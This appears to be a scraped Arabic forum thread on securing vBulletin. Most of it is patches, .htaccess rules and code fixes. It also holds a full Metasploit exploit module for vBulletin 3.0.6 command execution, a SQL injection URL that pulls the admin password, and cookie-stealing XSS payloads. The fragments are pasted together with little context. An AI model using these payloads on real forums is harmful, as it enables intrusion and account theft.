الملفات المرفقة

patch_35x.zip‏

الملفات المرفقة

patch_30x.zip‏

الملفات المرفقة

functions_search.zip‏

الملفات المرفقة

banning.rar‏

---

RemoveType .php .php3 .phtml .pl .cgi .rar .jpg .3gp .gif .asp

---

---

<if condition="$show['currentlocation']">
                    <div><if condition="$userinfo['action']">$userinfo[action] $userinfo[where]<if condition="$show['detailedtime']"> - <else /> @ </if> $userinfo[time]<else />$vbphrase[offline]</if>&nbsp;</div>
                </if>

---

الملفات المرفقة

3010_patch.zip‏

الملفات المرفقة

351_patch.rar‏

3010_patch.rar‏

الملفات المرفقة

htaccess.txt‏

الملفات المرفقة

patch3.zip‏

---

index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=1

---

---

foreach ($this->superglobal_lookup AS $arrayname)
            {
                $registry->superglobal_size["$arrayname"] = sizeof($GLOBALS["$arrayname"]);

                foreach (array_keys($GLOBALS["$arrayname"]) AS $varname)
                {
                    unset($GLOBALS["$varname"]);  <<------

---

---

unset($GLOBALS["$varname"]);

---

---

if( !in_array($varname, $this->superglobal_lookup ))
            unset($GLOBALS["$varname"]);

---

---

:: ويمكنك حذف الاهداءات القديمه واضافه أهداءات وأشياء مماثله ::

---

---

$userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . TABLE_PREFIX . "user WHERE userid = " . $item_number[1]);

---

---

$userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " .
TABLE_PREFIX . "user WHERE userid = " .intval( $item_number[1]));

---

---

RemoveType .php .php3 .phtml .pl .cgi .rar .jpg .3gp .gif .asp

---

---

<Script>javascript:alert(document.cookie);</Script>

---

---

$pm['title'] = trim($pm['title']);

---

---

$pm['title'] = trim(xss_clean($pm['title']));

---

الملفات المرفقة

functions_search[1].php.zip‏

---

// Prefix that all vBulletin cookies will have
// For example
$cookieprefix = 'bb';

---

الملفات المرفقة

functions_faq.zip‏

الملفات المرفقة

wardeyat-hak-haking.zip‏

---

##
#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#    Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#        Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#    http://metasploit.com/projects/Framework for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
        'Name'    => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors'  => [ 'str0ke' ],
        'Arch'    => [ ],
        'OS'      => [ ],
        'Priv'    => 0,
        'UserOpts' =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 80],
                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                'SSL'  => [0, 'BOOL', 'Use SSL'],
          },

        'Description' => Pex::Text::Freeform(qq{
                This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

        'Refs' =>
          [
                ['MIL', '832'],
          ],

        'Payload' =>
          {
                'Space' => 512,
                'Keys'  => ['cmd', 'cmd_bash'],
          },

        'Keys' => ['vBulletin'],
  };

sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
        return($self);
}

sub Exploit {
        my $self = shift;
        my $target_host    = $self->GetVar('RHOST');
        my $target_port    = $self->GetVar('RPORT');
        my $vhost          = $self->GetVar('VHOST') || $target_host;
        my $path          = $self->GetVar('RPATH');
        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

        # Encode the command as a set of chr() function calls
        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

        # Create the get request data
        my $data = "?do=page&template={\${passthru($byte)}}";

        my $req =
                "GET $path$data HTTP/1.1\r\n".
                "Host: $vhost:$target_port\r\n".
                "Content-Type: application/html\r\n".
                "Content-Length: ". length($data)."\r\n".
                "Connection: Close\r\n".
                "\r\n";

        my $s = Msf::Socket::Tcp->new(
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'      => $self->GetVar('SSL'),
          );

        if ($s->IsError){
                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                return;
        }

        $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

        $s->Send($req);

        my $results = $s->Recv(-1, 20);
        $s->Close();

        return;
}

1;

---

---

// initialize some template bits
$faqbits = '';
$faqlinks = '';

---

---

$navbits[''] =$vbphrase['faq'];

---

---

$edit['title'] = trim($_POST['title']);

---

---

$edit['title'] = trim(xss_clean($_POST['title']));

---

---

$title = addslashes($title);
if (strstr($title,"script") != NULL){
echo "Dont Play With Me Ok Man<br>vBulletin<br>note: use scr!pt";
exit;
}

---

---

// ####################### SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// #################### DEFINE IMPORTANT CONSTANTS #######################
define('NO_REGISTER_GLOBALS', 1);
define('THIS_SCRIPT', 'index');

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array('holiday');

// get special data templates from the datastore
$specialtemplates = array(
        'userstats',
        'birthdaycache',
        'maxloggedin',
        'iconcache',
        'eventcache',
        'mailqueue'
);

// pre-cache templates used by all actions
$globaltemplates = array(
        'FORUMHOME',
        'forumhome_event',
        'forumhome_forumbit_level1_nopost',
        'forumhome_forumbit_level1_post',
        'forumhome_forumbit_level2_nopost',
        'forumhome_forumbit_level2_post',
        'forumhome_lastpostby',
        'forumhome_loggedinuser',
        'forumhome_moderator',
        'forumhome_pmloggedin',
        'forumhome_subforumbit_nopost',
        'forumhome_subforumbit_post',
        'forumhome_subforumseparator_nopost',
        'forumhome_subforumseparator_post'
);

// pre-cache templates used by specific actions
$actiontemplates = array();

// ######################### REQUIRE BACK-END ############################
require_once('./global.php');
require_once('./includes/functions_bigthree.php');
require_once('./includes/functions_forumlist.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################

// get permissions to view forumhome
if (!($permissions['forumpermissions'] & CANVIEW))
{
        print_no_permission();
}

// get forumid if set, otherwise set to -1
globalize($_REQUEST, array('forumid' => INT));

if (! is_array($foruminfo))
{
        $forumid = -1;
}
else
{
        // draw nav bar
        $navbits = array();
        $parentlist = array_reverse(explode(',', substr($foruminfo['parentlist'], 0, -3)));
        foreach ($parentlist AS $forumID)
        {
                $forumTitle = $forumcache["$forumID"]['title'];
                $navbits["forumdisplay.php?$session[sessionurl]f=$forumID"] = $forumTitle;
        }

        // pop the last element off the end of the $nav array so that we can show it without a link
        array_pop($navbits);

        $navbits[''] = $foruminfo['title'];
        $navbits = construct_navbits($navbits);
}

// ### WELCOME MESSAGE #################################################
if ($bbuserinfo['userid'])
{        // registered user
        $showmemberwelcome = true;
}
else
{        // guest
        $showmemberwelcome = false;
}

$today = vbdate('Y-m-d', TIMENOW, false, false);

// ### TODAY'S BIRTHDAYS #################################################
if ($vboptions['showbirthdays'])
{
        $birthdaystore = unserialize($datastore['birthdaycache']);
        if (!is_array($birthdaystore) OR ($today != $birthdaystore['day1'] AND $today != $birthdaystore['day2']))
        {
                // Need to update!
                require_once('./includes/functions_databuild.php');
                $birthdaystore = build_birthdays();
                DEVDEBUG('Updated Birthdays');
        }
        switch($today)
        {
                case $birthdaystore['day1']:
                        $birthdays = $birthdaystore['users1'];
                        break;

                case $birthdaystore['day2'];
                        $birthdays = $birthdaystore['users2'];
                        break;
        }
        // memory saving
        unset($birthdaystore);

        $show['birthdays'] = iif ($birthdays, true, false);
}
else
{
        $show['birthdays'] = false;
}

// ### TODAY'S EVENTS #################################################
if ($vboptions['showevents'])
{
        require_once('./includes/functions_calendar.php');

        $future = gmdate('n-j-Y' , TIMENOW + 43200 + (86400 * ($vboptions['showevents'] - 1)));
        $eventstore = unserialize($datastore['eventcache']);

        if (!is_array($eventstore) OR $future != $eventstore['date'])
        {
                // Need to update!
                require_once('./includes/functions_databuild.php');
                $eventstore = build_events();
                DEVDEBUG('Updated Events');
        }

        unset($eventstore['date']);
        $events = array();
        $eventcount = 0;
        foreach ($eventstore AS $eventid => $eventinfo)
        {
                $offset = iif (!$eventinfo['utc'], $bbuserinfo['tzoffset'], $bbuserinfo['timezoneoffset']);
                $eventinfo['dateline_from_user'] = $eventinfo['dateline_from'] + $offset * 3600;
                $eventinfo['dateline_to_user'] = $eventinfo['dateline_to'] + $offset * 3600;
                $gettime = TIMENOW - $vboptions['hourdiff'];
                $iterations = 0;

                if ($bbuserinfo['calendarpermissions']["$eventinfo[calendarid]"] & CANVIEWCALENDAR OR $eventinfo['holidayid'])
                {
                        if ($eventinfo['userid'] == $bbuserinfo['userid'] OR $bbuserinfo['calendarpermissions']["$eventinfo[calendarid]"] & CANVIEWOTHERSEVENT OR $eventinfo['holidayid'])
                        {
                                while ($iterations < $vboptions['showevents'])
                                {
                                        $todaydate = getdate($gettime);
                                        if (cache_event_info($eventinfo, $todaydate['mon'], $todaydate['mday'], $todaydate['year']))
                                        {
                                                if (!$vboptions['showeventtype'])
                                                {
                                                        $events["$eventinfo[eventid]"][] = $gettime;
                                                }
                                                else
                                                {
                                                        $events["$gettime"][] = $eventinfo['eventid'];
                                                }
                                                $eventcount++;
                                        }
                                        $iterations++;
                                        $gettime += 86400;
                                }
                        }
                }
        }

        if (!empty($events))
        {
                ksort($events, SORT_NUMERIC);
                foreach($events AS $index => $value)
                {
                        $pastevent = 0;
                        $pastcount = 0;
                        unset($eventdates, $comma, $daysevents);
                        if (!$vboptions['showeventtype'])
                        {        // Group by Event // $index = $eventid
                                unset($day);
                                foreach($value AS $key => $dateline)
                                {
                                        if (($dateline - 86400) == $pastevent AND !$eventinfo['holidayid'])
                                        {
                                                $pastevent = $dateline;
                                                $pastcount++;
                                                continue;
                                        }
                                        else
                                        {
                                                if ($pastcount)
                                                {
                                                        $eventdates = construct_phrase($vbphrase['event_x_to_y'], $eventdates, vbdate($vboptions['dateformat'], $pastevent, false, true, false));
                                                }
                                                $pastcount = 0;
                                                $pastevent = $dateline;
                                        }
                                        if (!$day)
                                        {
                                                $day = vbdate('Y-n-j', $dateline, false, false);
                                        }
                                        $eventdates .= $comma . vbdate($vboptions['dateformat'], $dateline, false, true, false);
                                        $comma = ', ';
                                        $eventinfo = $eventstore["$index"];
                                }
                                if ($pastcount)
                                {
                                        $eventdates = construct_phrase($vbphrase['event_x_to_y'], $eventdates, vbdate($vboptions['dateformat'], $pastevent, false, true, false));
                                }



                                if ($eventinfo['holidayid'])
                                {
                                        $callink = "<a href=\"calendar.php?$session[sessionurl]do=getinfo&amp;day=$day\">" . $vbphrase['holiday_title_' . $eventinfo['varname']] . "</a>";
                                }
                                else
                                {
                                        $callink = "<a href=\"calendar.php?$session[sessionurl]do=getinfo&amp;day=$day&amp;e=$eventinfo[eventid]&amp;c=$eventinfo[calendarid]\">$eventinfo[title]</a>";
                                }
                        }
                        else
                        {        // Group by Date
                                $eventdate = vbdate($vboptions['dateformat'], $index, false, true, false);
                                $day = vbdate('Y-n-j', $index, false, false);
                                foreach($value AS $key => $eventid)
                                {
                                        $eventinfo = $eventstore["$eventid"];
                                        if ($eventinfo['holidayid'])
                                        {
                                                $daysevents .= $comma . "<a href=\"calendar.php?$session[sessionurl]do=getinfo&amp;day=$day\">" . $vbphrase['holiday_title_' . $eventinfo['varname']] . "</a>";
                                        }
                                        else
                                        {
                                                $daysevents .= $comma . "<a href=\"calendar.php?$session[sessionurl]do=getinfo&amp;day=$day&amp;e=$eventinfo[eventid]&amp;c=$eventinfo[calendarid]\">$eventinfo[title]</a>";
                                        }
                                        $comma = ', ';
                                }
                        }
                        eval('$upcomingevents .= "' . fetch_template('forumhome_event') . '";');
                }
                // memory saving
                unset($events, $eventstore);
        }
        $show['upcomingevents'] = iif ($upcomingevents, true, false);
        $show['todaysevents'] = iif ($vboptions['showevents'] == 1, true, false);
}
else
{
        $show['upcomingevents'] = false;
}

// ### LOGGED IN USERS #################################################
$activeusers = '';
if ($vboptions['displayloggedin'])
{
        $datecut = TIMENOW - $vboptions['cookietimeout'];
        $numbervisible = 0;
        $numberregistered = 0;
        $numberguest = 0;

        $forumusers = $DB_site->query("
                SELECT
                        user.username, (user.options & $_USEROPTIONS[invisible]) AS invisible, user.usergroupid,
                        session.userid, session.inforum, session.lastactivity,
                        IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid
                FROM " . TABLE_PREFIX . "session AS session
                LEFT JOIN " . TABLE_PREFIX . "user AS user ON(user.userid = session.userid)
                WHERE session.lastactivity > $datecut
                " . iif($vboptions['displayloggedin'] == 1, "ORDER BY username ASC") . "
        ");

        if ($bbuserinfo['userid'])
        {
                // fakes the user being online for an initial page view of index.php
                $bbuserinfo['joingroupid'] = iif($bbuserinfo['displaygroupid'], $bbuserinfo['displaygroupid'], $bbuserinfo['usergroupid']);
                $userinfos = array
                (
                        $bbuserinfo['userid'] => array
                        (
                                'userid' => $bbuserinfo['userid'],
                                'username' => $bbuserinfo['username'],
                                'invisible' => $bbuserinfo['invisible'],
                                'inforum' => 0,
                                'lastactivity' => TIMENOW,
                                'usergroupid' => $bbuserinfo['usergroupid'],
                                'displaygroupid' => $bbuserinfo['displaygroupid'],
                        )
                );
        }
        else
        {
                $userinfos = array();
        }
        $inforum = array();

        while ($loggedin = $DB_site->fetch_array($forumusers))
        {
                $userid = $loggedin['userid'];
                if (!$userid)
                {        // Guest
                        $numberguest++;
                        $inforum["$loggedin[inforum]"]++;
                }
                else if (empty($userinfos["$userid"]) OR ($userinfos["$userid"]['lastactivity'] < $loggedin['lastactivity']))
                {
                        $userinfos["$userid"] = $loggedin;
                }
        }

        foreach($userinfos AS $userid => $loggedin)
        {
                $numberregistered++;
                if ($userid != $bbuserinfo['userid'])
                {
                        $inforum["$loggedin[inforum]"]++;
                }
                $loggedin['musername'] = fetch_musername($loggedin);

                if (fetch_online_status($loggedin))
                {
                        $numbervisible++;
                        eval('$activeusers .= ", ' . fetch_template('forumhome_loggedinuser') . '";');
                }
        }

        // memory saving
        unset($userinfos, $loggedin);

        $activeusers = substr($activeusers , 2); // get rid of initial comma

        $DB_site->free_result($loggedins);

        $totalonline = $numberregistered + $numberguest;
        $numberinvisible = $numberregistered - $numbervisible;

        // ### MAX LOGGEDIN USERS ################################
        $maxusers = unserialize($datastore['maxloggedin']);
        if (intval($maxusers['maxonline']) <= $totalonline)
        {
                $maxusers['maxonline'] = $totalonline;
                $maxusers['maxonlinedate'] = TIMENOW;
                build_datastore('maxloggedin', serialize($maxusers));
        }

        $recordusers = $maxusers['maxonline'];
        $recorddate = vbdate($vboptions['dateformat'], $maxusers['maxonlinedate'], true);
        $recordtime = vbdate($vboptions['timeformat'], $maxusers['maxonlinedate']);

        $show['loggedinusers'] = true;
}
else
{
        $show['loggedinusers'] = false;
}

// ### GET FORUMS & MODERATOR iCACHES ########################
cache_ordered_forums(1);
if ($vboptions['showmoderatorcolumn'])
{
        cache_moderators();
}
else
{
        $imodcache = array();
        $mod = array();
}

// define max depth for forums display based on $vboptions[forumhomedepth]
define('MAXFORUMDEPTH', $vboptions['forumhomedepth']);

$forumbits = construct_forum_bit($forumid);

// ### BOARD STATISTICS #################################################

// get total threads & posts from the forumcache
$totalthreads = 0;
$totalposts = 0;
if (is_array($forumcache))
{
        foreach ($forumcache AS $forum)
        {
                $totalthreads += $forum['threadcount'];
                $totalposts += $forum['replycount'];
        }
}
$totalthreads = vb_number_format($totalthreads);
$totalposts = vb_number_format($totalposts);

// get total members and newest member from template
$userstats = unserialize($datastore['userstats']);
$numbermembers = vb_number_format($userstats['numbermembers']);
$newusername = $userstats['newusername'];
$newuserid = $userstats['newuserid'];

// ### ALL DONE! SPIT OUT THE HTML AND LET'S GET OUTA HERE... ###

eval('$navbar = "' . fetch_template('navbar') . '";');
eval('print_output("' . fetch_template('FORUMHOME') . '");');

---

---

$pm['title'] = trim($pm['title']);

---

---

$pm['title'] = trim(xss_clean($pm['title']));

---

---

$pm['title'] = htmlspecialchars_uni($pm['title']);

---

---

flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(document.cookie);'[/flash]

---

---

$bbcodes['custom']['recurse']['highlight'][0] = array('replace_html' => "<span class=\"highlight\">\\7</span>");

---

---

// For Magic-Box Added By AL3NDALEEB

$bbcodes['custom']['find']['[poem'] = '#\[poe[m](\s|&quot;|"|\'|)(.*)\\1\](<br>|<br />|\r\n|\n|\r)??(.*)(<br>|<br />|\r\n|\n|\r)??\[/poe[m]\]#esiU';
$bbcodes['custom']['replace']['[poem'] = "handle_bbcode_normal('\\4', '\\2', '', 'poem')";
$bbcodes['custom']['recurse']['poem'][0] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[frame='] = '#\[frame=(&quot;|"|\'|)([0-9]+)[ ]+([0-9]+)[ ]*\\1\](<br>|<br />|\r\n|\n|\r)??(.*)(<br>|<br />|\r\n|\n|\r)??\[/frame\]#esiU';
$bbcodes['custom']['replace']['[frame='] = "handle_bbcode_normal('\\5', '\\2', '\\3', 'frame')";
$bbcodes['custom']['recurse']['frame'][0] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[grade='] = '#\[grade(&quot;|"|\'|)(.*)\\1\](<br>|<br />|\r\n|\n|\r)??(.*)(<br>|<br />|\r\n|\n|\r)??\[/grade\]#esiU';
$bbcodes['custom']['replace']['[grade='] = "handle_bbcode_normal('\\4', '\\2', '', 'grade')";
$bbcodes['custom']['recurse']['grade'][0] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[hr]'] = '#\[hr\]#esiU';
$bbcodes['custom']['replace']['[hr]'] = "handle_bbcode_normal('hr', '', '', 'hr')";
$bbcodes['custom']['recurse']['hr'][0] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[line]'] = '#\[line\]#esiU';
$bbcodes['custom']['replace']['[line]'] = "handle_bbcode_normal('line', '', '', 'hr')";
$bbcodes['custom']['recurse']['line'][0] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[flash='] = '#\[flash=(&quot;|"|\'|)(.*)\\1\](width=)\\1([0-9]+)\\1[ ]+(height=)\\1([0-9]+)\\1\[/flash\]#esiU';
$bbcodes['custom']['replace']['[flash='] = "handle_bbcode_normal('\\2', '\\4','\\6', 'flash')";
$bbcodes['custom']['recurse']['flash'][0] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[flash='] = '#\[flash=(&quot;|"|\'|)(.*)\\1\](height=)\\1([0-9]+)\\1[ ]+(width=)\\1([0-9]+)\\1\[/flash\]#esiU';
$bbcodes['custom']['replace']['[flash='] = "handle_bbcode_normal('\\2', '\\6','\\4', 'flash')";
$bbcodes['custom']['recurse']['flash'][1] = array('handler' => 'handle_bbcode_normal');

$bbcodes['custom']['find']['[flash='] = '#\[flash=(&quot;|"|\'|)(.*)\\1\]([w|W][i|I][d|D][t|T][h|H][=])\\1([0-9]+)\\1[ ]+([h|H][e|E][i|I][g|G][h|H][t|T][=])\\1([0-9]+)\\1\[/flash\]#esiU';
$bbcodes['custom']['replace']['[flash='] = "handle_bbcode_normal('\\2', '\\4','\\6', 'flash')";
$bbcodes['custom']['recurse']['flash'][0] = array('handler' => 'handle_bbcode_normal');

//

---

---

?>

---

---

// For Magic-Box Added By AL3NDALEEB
function handle_bbcode_normal($message, $param1 = '', $param2 = '', $type = '' )
{

// remove empty codes
if (trim($message) == '' || $type == '')
{
return '';
}

// remove unnecessary escaped quotes
$message = strip_smilies(str_replace('\\"', '"', $message));

if($type == 'poem'){

$param1 = str_replace('\\"', '"', $param1);
$param1 = str_replace('"', '"', $param1);

// remove smilies from param
$param1 = strip_smilies($param1);
$html = '<div tag="'.$param1.'" style="display:none">'.$message.'</div><script>doPoem(0)</script>';

}elseif($type == 'frame'){

$param1 = str_replace('\\"', '"', $param1);
$param1 = str_replace('"', '&quot;', $param1);
$param2 = str_replace('\\"', '"', $param2);
$param2 = str_replace('"', '&quot;', $param2);

// remove smilies from param
$param1 = strip_smilies($param1);
$param2 = strip_smilies($param2);
$html = '<div id="myframe" tag="'.$param1.'|'.$param2.'" style="display:none">'.$message.'</div><script>drawFrame()</script>';

}elseif($type == 'hr'){

$html = '<hr noshade size=1>';

}elseif($type == 'grade'){

$param1 = str_replace('\\"', '"', $param1);
$param1 = str_replace('"', '&quot;', $param1);

// remove smilies from param
$param1 = strip_smilies($param1);
$html = '<div id="mygradient" tag="'.$param1.'" style="display:none">'.$message.'</div><script>drawGradient()</script>';

}elseif($type == 'flash'){
if (!preg_match('#^[a-z]+://#si', $message)){
return '';
}
$param1 = intval($param1);
$param2 = intval($param2);
$html = '<embed src="'.$message.'" width="'.$param1.'" height="'.$param2.'" quality=high loop=true menu=false TYPE="application/x-shockwave-flash"</embed>';
}

return $html;
}

---

---

$admincpdir = 'admincp';

---

---

$modcpdir = 'modcp';

---

---

foreach ($this->superglobal_lookup AS $arrayname)
            {
                $registry->superglobal_size["$arrayname"] = sizeof($GLOBALS["$arrayname"]);

                foreach (array_keys($GLOBALS["$arrayname"]) AS $varname)
                {
                    unset($GLOBALS["$varname"]);  <<------ تقوم بإزالة المتغيرات من المصفوفه العامه وهنا الخطأ حيث يجب ان تتأكد من المتغير قبل إزالته وكما تلاحظون لا يوجد شرط للتحقق
                }
            }

---

---

unset($GLOBALS["$varname"]);

---

---

if( !in_array($varname, $this->superglobal_lookup ))
            unset($GLOBALS["$varname"]);

---